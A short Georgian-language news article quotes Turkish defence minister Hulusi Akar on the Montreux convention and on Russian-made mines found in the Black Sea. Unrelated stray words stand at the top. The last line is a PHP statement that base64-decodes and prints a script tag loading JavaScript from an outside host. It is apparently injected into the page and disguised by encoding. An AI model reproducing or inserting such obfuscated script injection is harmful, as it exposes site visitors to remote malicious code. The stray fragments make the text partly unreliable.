celsiusi
ავერსი შნაიდერი
თურქეთის თავდაცვის მინისტრმა, ჰულუსი აქარიმ განაცხადა, რომ თურქეთი დაიცავს მონტროს წესებს, სამხედრო ხომალდებს შავ ზღვაში არ გაუშვებს.
 
შავ ზღვაში აღმოჩენილ ნაღმებთან დაკავშირებით თურქეთის თავდაცვის მინისტრმა განაცხადა, რომ ნაღმები რუსული წარმოებისაა, მაგრამ ჯერჯერობით გაურკვეველია, თუ რომელმა ქვეყანამ დატოვა ნაღმები წყალში.
 
„ეს ნაღმები შესაძლოა, დატოვეს გეგმის ფარგლებში, რომ ნატო-ს ნაღმოსანი ტრალერები შემოსულიყო და თურქეთზე ზეწოლა მოეხდინათ. ჩვენ გვაქვს ეჭვები ამასთან დაკავშირებით. პრესაში ვრცელდება ინფორმაცია, რომ დაახლოებით 400 ნაღმია, მაგრამ ეს სრული საიდუმლოა. რაოდენობა უცნობია. ჩვენ ასევე გავაფრთხილეთ სხვა ქვეყნები. ვესაუბრეთ ბულგარეთისა და რუმინეთის ხელისუფლებას. ისინი ასევე ატარებენ კვლევებს“, – აღნიშნა თურქეთის თავდაცვის მინისტრმა.
754
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");